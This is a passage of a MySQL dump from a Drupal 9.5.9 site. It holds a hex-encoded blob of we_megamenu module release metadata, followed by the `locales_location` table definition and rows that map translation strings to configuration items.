65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e31302d62657461312e7461722e677a223b733a343a2264617465223b733a31303a2231353931333535313831223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a383a225e38207c7c205e39223b733a353a227465726d73223b613a303a7b7d7d733a373a22382e782d312e39223b613a31313a7b733a343a226e616d65223b733a31393a2277655f6d6567616d656e7520382e782d312e39223b733a373a2276657273696f6e223b733a373a22382e782d312e39223b733a333a22746167223b733a373a22382e782d312e39223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e39223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e392e7461722e677a223b733a343a2264617465223b733a31303a2231353835363730373133223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e38223b613a31313a7b733a343a226e616d65223b733a31393a2277655f6d6567616d656e7520382e782d312e38223b733a373a2276657273696f6e223b733a373a22382e782d312e38223b733a333a22746167223b733a373a22382e782d312e38223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e38223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e382e7461722e677a223b733a343a2264617465223b733a31303a2231353835363730353039223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e37223b613a31313a7b733a343a226e616d65223b733a31393a2277655f6d6567616d656e7520382e782d312e37223b733a373a2276657273696f6e223b733a373a22382e782d312e37223b733a333a22746167223b733a373a22382e782d312e37223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e37223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e372e7461722e677a223b733a343a2264617465223b733a31303a2231353735363138373834223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e36223b613a31313a7b733a343a226e616d65223b733a31393a2277655f6d6567616d656e7520382e782d312e36223b733a373a2276657273696f6e223b733a373a22382e782d312e36223b733a333a22746167223b733a373a22382e782d312e36223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e36223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e362e7461722e677a223b733a343a2264617465223b733a31303a2231353735363138313835223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e35223b613a31313a7b733a343a226e616d65223b733a31393a2277655f6d6567616d656e7520382e782d312e35223b733a373a2276657273696f6e223b733a373a22382e782d312e35223b733a333a22746167223b733a373a22382e782d312e35223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e35223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e352e7461722e677a223b733a343a2264617465223b733a31303a2231353530313134323834223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e34223b613a31313a7b733a343a226e616d65223b733a31393a2277655f6d6567616d656e7520382e782d312e34223b733a373a2276657273696f6e223b733a373a22382e782d312e34223b733a333a22746167223b733a373a22382e782d312e34223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e34223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e342e7461722e677a223b733a343a2264617465223b733a31303a2231353339373639333830223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e33223b613a31313a7b733a343a226e616d65223b733a31393a2277655f6d6567616d656e7520382e782d312e33223b733a373a2276657273696f6e223b733a373a22382e782d312e33223b733a333a22746167223b733a373a22382e782d312e33223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e33223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e332e7461722e677a223b733a343a2264617465223b733a31303a2231353336393133393830223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e32223b613a31313a7b733a343a226e616d65223b733a31393a2277655f6d6567616d656e7520382e782d312e32223b733a373a2276657273696f6e223b733a373a22382e782d312e32223b733a333a22746167223b733a373a22382e782d312e32223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e32223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e322e7461722e677a223b733a343a2264617465223b733a31303a2231353332343231373834223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e31223b613a31313a7b733a343a226e616d65223b733a31393a2277655f6d6567616d656e7520382e782d312e31223b733a373a2276657273696f6e223b733a373a22382e782d312e31223b733a333a22746167223b733a373a22382e782d312e31223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e31223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e312e7461722e677a223b733a343a2264617465223b733a31303a2231353233343330343834223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31333a22382e782d312e312d6265746132223b613a31313a7b733a343a226e616d65223b733a32353a2277655f6d6567616d656e7520382e782d312e312d6265746132223b733a373a2276657273696f6e223b733a31333a22382e782d312e312d6265746132223b733a333a22746167223b733a31333a22382e782d312e312d6265746132223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e312d6265746132223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37303a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e312d62657461322e7461722e677a223b733a343a2264617465223b733a31303a2231353233343239383835223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a373a22382e782d312e30223b613a31313a7b733a343a226e616d65223b733a31393a2277655f6d6567616d656e7520382e782d312e30223b733a373a2276657273696f6e223b733a373a22382e782d312e30223b733a333a22746167223b733a373a22382e782d312e30223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e30223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e302e7461722e677a223b733a343a2264617465223b733a31303a2231353232333739383835223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31313a22382e782d312e302d726332223b613a31313a7b733a343a226e616d65223b733a32333a2277655f6d6567616d656e7520382e782d312e302d726332223b733a373a2276657273696f6e223b733a31313a22382e782d312e302d726332223b733a333a22746167223b733a31313a22382e782d312e302d726332223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36333a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e302d726332223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36383a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e302d7263322e7461722e677a223b733a343a2264617465223b733a31303a2231353132333735373835223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a35383a2252432072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31313a22382e782d312e302d726331223b613a31313a7b733a343a226e616d65223b733a32333a2277655f6d6567616d656e7520382e782d312e302d726331223b733a373a2276657273696f6e223b733a31313a22382e782d312e302d726331223b733a333a22746167223b733a31313a22382e782d312e302d726331223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36333a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e302d726331223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36383a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e302d7263312e7461722e677a223b733a343a2264617465223b733a31303a2231353033333939353435223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35383a2252432072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31333a22382e782d312e302d6265746131223b613a31313a7b733a343a226e616d65223b733a32353a2277655f6d6567616d656e7520382e782d312e302d6265746131223b733a373a2276657273696f6e223b733a31333a22382e782d312e302d6265746131223b733a333a22746167223b733a31333a22382e782d312e302d6265746131223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e302d6265746131223b733a31333a22646f776e6c6f61645f6c696e6b223b733a37303a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e302d62657461312e7461722e677a223b733a343a2264617465223b733a31303a2231353031313232353434223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a333a22382e78223b7d733a31313a22382e782d312e782d646576223b613a31313a7b733a343a226e616d65223b733a32333a2277655f6d6567616d656e7520382e782d312e782d646576223b733a373a2276657273696f6e223b733a31313a22382e782d312e782d646576223b733a333a22746167223b733a373a22382e782d312e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36333a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f77655f6d6567616d656e752f72656c65617365732f382e782d312e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36383a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f77655f6d6567616d656e752d382e782d312e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373335383030393138223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31303a225e3130207c7c205e3131223b733a353a227465726d73223b613a303a7b7d7d7d733a31303a226c6173745f6665746368223b693a313738373833363338313b7d, 1787922781);

-- --------------------------------------------------------

--
-- Table structure for table `locales_location`
--

CREATE TABLE `locales_location` (
  `lid` int NOT NULL COMMENT 'Unique identifier of this location.',
  `sid` int NOT NULL COMMENT 'Unique identifier of this string.',
  `type` varchar(50) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The location type (file, config, path, etc).',
  `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'Type dependent location information (file name, path, etc).',
  `version` varchar(20) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT 'none' COMMENT 'Version of Drupal where the location was found.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Location information for source strings.';

--
-- Dumping data for table `locales_location`
--

INSERT INTO `locales_location` (`lid`, `sid`, `type`, `name`, `version`) VALUES
(1, 1, 'configuration', 'block_content.type.basic', '9.5.9'),
(2, 2, 'configuration', 'block_content.type.basic', '9.5.9'),
(3, 3, 'configuration', 'comment.type.comment', '9.5.9'),
(4, 4, 'configuration', 'comment.type.comment', '9.5.9'),
(5, 5, 'configuration', 'contact.form.feedback', '9.5.9'),
(6, 6, 'configuration', 'contact.form.feedback', '9.5.9'),
(7, 7, 'configuration', 'core.base_field_override.node.page.promote', '9.5.9'),
(8, 8, 'configuration', 'core.base_field_override.node.page.promote', '9.5.9'),
(9, 9, 'configuration', 'core.base_field_override.node.page.promote', '9.5.9'),
(10, 10, 'configuration', 'field.field.block_content.basic.body', '9.5.9'),
(11, 11, 'configuration', 'field.field.comment.comment.comment_body', '9.5.9'),
(12, 10, 'configuration', 'field.field.node.article.body', '9.5.9'),
(13, 12, 'configuration', 'field.field.node.article.comment', '9.5.9'),
(14, 13, 'configuration', 'field.field.node.article.field_image', '9.5.9'),
(15, 14, 'configuration', 'field.field.node.article.field_tags', '9.5.9'),
(16, 15, 'configuration', 'field.field.node.article.field_tags', '9.5.9'),
(17, 10, 'configuration', 'field.field.node.page.body', '9.5.9'),
(18, 16, 'configuration', 'field.field.user.user.user_picture', '9.5.9'),
(19, 17, 'configuration', 'field.field.user.user.user_picture', '9.5.9'),
(20, 18, 'configuration', 'filter.format.basic_html', '9.5.9'),
(21, 19, 'configuration', 'filter.format.full_html', '9.5.9'),
(22, 20, 'configuration', 'filter.format.restricted_html', '9.5.9'),
(23, 21, 'configuration', 'node.type.article', '9.5.9'),
(24, 22, 'configuration', 'node.type.article', '9.5.9'),
(25, 23, 'configuration', 'node.type.page', '9.5.9'),
(26, 24, 'configuration', 'node.type.page', '9.5.9'),
(27, 14, 'configuration', 'taxonomy.vocabulary.tags', '9.5.9'),
(28, 25, 'configuration', 'taxonomy.vocabulary.tags', '9.5.9'),
(29, 26, 'configuration', 'user.role.administrator', '9.5.9'),
(30, 27, 'configuration', 'user.role.anonymous', '9.5.9'),
(31, 28, 'configuration', 'user.role.authenticated', '9.5.9'),
(32, 29, 'configuration', 'user.role.content_editor', '9.5.9'),
(33, 30, 'configuration', 'user.settings', '9.5.9'),
(34, 31, 'configuration', 'core.entity_view_mode.block_content.full', '9.5.9'),
(35, 32, 'configuration', 'captcha.captcha_point.contact_message_feedback_form', '9.5.9'),
(36, 33, 'configuration', 'captcha.captcha_point.contact_message_personal_form', '9.5.9'),
(37, 34, 'configuration', 'captcha.captcha_point.user_login_form', '9.5.9'),
(38, 35, 'configuration', 'captcha.captcha_point.user_pass', '9.5.9'),
(39, 36, 'configuration', 'captcha.captcha_point.user_register_form', '9.5.9'),
(40, 37, 'configuration', 'captcha.settings', '9.5.9'),
(41, 38, 'configuration', 'captcha.settings', '9.5.9'),
(42, 39, 'configuration', 'core.entity_view_mode.comment.full', '9.5.9'),
(43, 40, 'configuration', 'system.action.comment_delete_action', '9.5.9'),
(44, 41, 'configuration', 'system.action.comment_publish_action', '9.5.9'),
(45, 42, 'configuration', 'system.action.comment_save_action', '9.5.9'),
(46, 43, 'configuration', 'system.action.comment_unpublish_action', '9.5.9'),
(47, 44, 'configuration', 'contact.form.personal', '9.5.9'),
(48, 6, 'configuration', 'contact.form.personal', '9.5.9'),
(49, 45, 'configuration', 'filter.format.plain_text', '9.5.9'),
(50, 46, 'configuration', 'image.style.large', '9.5.9'),
(51, 47, 'configuration', 'image.style.medium', '9.5.9'),
(52, 48, 'configuration', 'image.style.thumbnail', '9.5.9'),
(53, 49, 'configuration', 'image.style.wide', '9.5.9'),
(54, 50, 'configuration', 'language.entity.en', '9.5.9'),
(55, 51, 'configuration', 'language.entity.und', '9.5.9'),
(56, 52, 'configuration', 'language.entity.zxx', '9.5.9'),
(57, 53, 'configuration', 'core.entity_view_mode.media.full', '9.5.9'),
(58, 54, 'configuration', 'core.entity_form_mode.media.media_library', '9.5.9'),
(59, 54, 'configuration', 'core.entity_view_mode.media.media_library', '9.5.9'),
(60, 55, 'configuration', 'image.style.media_library', '9.5.9'),
(61, 54, 'configuration', 'views.view.media_library', '9.5.9'),
(62, 56, 'configuration', 'views.view.media_library', '9.5.9'),
(63, 57, 'configuration', 'views.view.media_library', '9.5.9'),
(64, 58, 'configuration', 'views.view.media_library', '9.5.9'),
(65, 59, 'configuration', 'views.view.media_library', '9.5.9'),
(66, 60, 'configuration', 'views.view.media_library', '9.5.9'),
(67, 61, 'configuration', 'views.view.media_library', '9.5.9'),
(68, 62, 'configuration', 'views.view.media_library', '9.5.9'),
(69, 63, 'configuration', 'views.view.media_library', '9.5.9'),
(70, 64, 'configuration', 'views.view.media_library', '9.5.9'),
(71, 65, 'configuration', 'views.view.media_library', '9.5.9'),
(72, 66, 'configuration', 'views.view.media_library', '9.5.9'),
(73, 67, 'configuration', 'views.view.media_library', '9.5.9'),
(74, 68, 'configuration', 'views.view.media_library', '9.5.9'),
(75, 69, 'configuration', 'views.view.media_library', '9.5.9'),
(76, 70, 'configuration', 'views.view.media_library', '9.5.9'),
(77, 71, 'configuration', 'views.view.media_library', '9.5.9'),
(78, 72, 'configuration', 'views.view.media_library', '9.5.9'),
(79, 73, 'configuration', 'views.view.media_library', '9.5.9'),
(80, 74, 'configuration', 'views.view.media_library', '9.5.9'),
(81, 75, 'configuration', 'views.view.media_library', '9.5.9'),
(82, 76, 'configuration', 'views.view.media_library', '9.5.9'),
(83, 77, 'configuration', 'views.view.media_library', '9.5.9'),
(84, 78, 'configuration', 'views.view.media_library', '9.5.9'),
(85, 79, 'configuration', 'views.view.media_library', '9.5.9'),
(86, 80, 'configuration', 'views.view.media_library', '9.5.9'),
(87, 81, 'configuration', 'views.view.media_library', '9.5.9'),
(88, 82, 'configuration', 'views.view.media_library', '9.5.9'),
(89, 83, 'configuration', 'views.view.media_library', '9.5.9'),
(90, 84, 'configuration', 'views.view.media_library', '9.5.9'),
(91, 85, 'configuration', 'views.view.media_library', '9.5.9'),
(92, 86, 'configuration', 'views.view.media_library', '9.5.9'),
(93, 87, 'configuration', 'views.view.media_library', '9.5.9'),
(94, 88, 'configuration', 'views.view.media_library', '9.5.9'),
(95, 89, 'configuration', 'views.view.media_library', '9.5.9'),
(96, 90, 'configuration', 'views.view.media_library', '9.5.9'),
(97, 91, 'configuration', 'views.view.media_library', '9.5.9'),
(98, 92, 'configuration', 'views.view.media_library', '9.5.9'),
(99, 93, 'configuration', 'views.view.media_library', '9.5.9'),
(100, 53, 'configuration', 'core.entity_view_mode.node.full', '9.5.9'),
(101, 94, 'configuration', 'core.entity_view_mode.node.rss', '9.5.9'),
(102, 95, 'configuration', 'core.entity_view_mode.node.search_index', '9.5.9'),
(103, 96, 'configuration', 'core.entity_view_mode.node.search_result', '9.5.9'),
(104, 97, 'configuration', 'core.entity_view_mode.node.teaser', '9.5.9'),
(105, 98, 'configuration', 'system.action.node_delete_action', '9.5.9'),
(106, 99, 'configuration', 'system.action.node_make_sticky_action', '9.5.9'),
(107, 100, 'configuration', 'system.action.node_make_unsticky_action', '9.5.9'),
(108, 101, 'configuration', 'system.action.node_promote_action', '9.5.9'),
(109, 102, 'configuration', 'system.action.node_publish_action', '9.5.9'),
(110, 103, 'configuration', 'system.action.node_save_action', '9.5.9'),
(111, 104, 'configuration', 'system.action.node_unpromote_action', '9.5.9'),
(112, 105, 'configuration', 'system.action.node_unpublish_action', '9.5.9'),
(113, 57, 'configuration', 'shortcut.set.default', '9.5.9'),
(114, 106, 'configuration', 'core.date_format.fallback', '9.5.9'),
(115, 107, 'configuration', 'core.date_format.html_date', '9.5.9'),
(116, 108, 'configuration', 'core.date_format.html_datetime', '9.5.9'),
(117, 109, 'configuration', 'core.date_format.html_month', '9.5.9'),
(118, 110, 'configuration', 'core.date_format.html_time', '9.5.9'),
(119, 111, 'configuration', 'core.date_format.html_week', '9.5.9'),
(120, 112, 'configuration', 'core.date_format.html_year', '9.5.9'),
(121, 113, 'configuration', 'core.date_format.html_yearless_date', '9.5.9'),
(122, 114, 'configuration', 'core.date_format.long', '9.5.9'),
(123, 115, 'configuration', 'core.date_format.long', '9.5.9'),
(124, 116, 'configuration', 'core.date_format.medium', '9.5.9'),
(125, 117, 'configuration', 'core.date_format.medium', '9.5.9'),
(126, 118, 'configuration', 'core.date_format.short', '9.5.9'),
(127, 119, 'configuration', 'core.date_format.short', '9.5.9'),
(128, 120, 'configuration', 'system.maintenance', '9.5.9'),
(129, 121, 'configuration', 'system.menu.account', '9.5.9'),
(130, 122, 'configuration', 'system.menu.account', '9.5.9'),
(131, 123, 'configuration', 'system.menu.admin', '9.5.9'),
(132, 124, 'configuration', 'system.menu.admin', '9.5.9'),
(133, 125, 'configuration', 'system.menu.footer', '9.5.9'),
(134, 126, 'configuration', 'system.menu.footer', '9.5.9'),
(135, 127, 'configuration', 'system.menu.main', '9.5.9'),
(136, 128, 'configuration', 'system.menu.main', '9.5.9'),
(137, 129, 'configuration', 'system.menu.tools', '9.5.9'),
(138, 130, 'configuration', 'system.menu.tools', '9.5.9'),
(139, 131, 'configuration', 'core.entity_view_mode.taxonomy_term.full', '9.5.9'),
(140, 132, 'configuration', 'system.action.taxonomy_term_publish_action', '9.5.9'),
(141, 133, 'configuration', 'system.action.taxonomy_term_unpublish_action', '9.5.9'),
(142, 134, 'configuration', 'core.entity_form_mode.user.register', '9.5.9'),
(143, 135, 'configuration', 'core.entity_view_mode.user.compact', '9.5.9'),
(144, 136, 'configuration', 'core.entity_view_mode.user.full', '9.5.9'),
(145, 137, 'configuration', 'system.action.user_block_user_action', '9.5.9'),
(146, 138, 'configuration', 'system.action.user_cancel_user_action', '9.5.9'),
(147, 139, 'configuration', 'system.action.user_unblock_user_action', '9.5.9'),
(148, 140, 'configuration', 'user.mail', '9.5.9'),
(149, 141, 'configuration', 'user.mail', '9.5.9'),
(150, 142, 'configuration', 'user.mail', '9.5.9'),
(151, 143, 'configuration', 'user.mail', '9.5.9'),
(152, 144, 'configuration', 'user.mail', '9.5.9'),
(153, 145, 'configuration', 'user.mail', '9.5.9'),
(154, 146, 'configuration', 'user.mail', '9.5.9'),
(155, 147, 'configuration', 'user.mail', '9.5.9'),
(156, 148, 'configuration', 'user.mail', '9.5.9'),
(157, 149, 'configuration', 'user.mail', '9.5.9'),
(158, 150, 'configuration', 'user.mail', '9.5.9'),
(159, 151, 'configuration', 'user.mail', '9.5.9'),
(160, 152, 'configuration', 'user.mail', '9.5.9'),
(161, 153, 'configuration', 'user.mail', '9.5.9'),
(162, 154, 'configuration', 'user.mail', '9.5.9'),
(163, 155, 'configuration', 'user.mail', '9.5.9'),
(164, 156, 'configuration', 'user.mail', '9.5.9'),
(165, 157, 'configuration', 'core.date_format.olivero_medium', '9.5.9'),
(166, 158, 'configuration', 'core.date_format.olivero_medium', '9.5.9'),
(167, 159, 'configuration', 'field.field.media.audio.field_media_audio_file', '9.5.9'),
(168, 160, 'configuration', 'field.field.media.document.field_media_document', '9.5.9'),
(169, 13, 'configuration', 'field.field.media.image.field_media_image', '9.5.9'),
(170, 161, 'configuration', 'field.field.media.remote_video.field_media_oembed_video', '9.5.9'),
(171, 162, 'configuration', 'field.field.media.video.field_media_video_file', '9.5.9'),
(172, 163, 'configuration', 'media.type.audio', '9.5.9'),
(173, 164, 'configuration', 'media.type.audio', '9.5.9'),
(174, 160, 'configuration', 'media.type.document', '9.5.9'),
(175, 165, 'configuration', 'media.type.document', '9.5.9'),
(176, 13, 'configuration', 'media.type.image', '9.5.9'),
(177, 166, 'configuration', 'media.type.image', '9.5.9'),
(178, 167, 'configuration', 'media.type.remote_video', '9.5.9'),
(179, 168, 'configuration', 'media.type.remote_video', '9.5.9'),
(180, 169, 'configuration', 'media.type.video', '9.5.9'),
(181, 170, 'configuration', 'media.type.video', '9.5.9'),
(182, 171, 'configuration', 'tour.tour.block-layout', '9.5.9'),
(183, 172, 'configuration', 'tour.tour.block-layout', '9.5.9'),
(184, 173, 'configuration', 'tour.tour.block-layout', '9.5.9'),
(185, 174, 'configuration', 'tour.tour.block-layout', '9.5.9'),
(186, 175, 'configuration', 'tour.tour.block-layout', '9.5.9'),
(187, 176, 'configuration', 'tour.tour.block-layout', '9.5.9'),
(188, 177, 'configuration', 'tour.tour.block-layout', '9.5.9'),
(189, 178, 'configuration', 'tour.tour.block-layout', '9.5.9'),
(190, 179, 'configuration', 'tour.tour.block-layout', '9.5.9'),
(191, 180, 'configuration', 'tour.tour.block-layout', '9.5.9'),
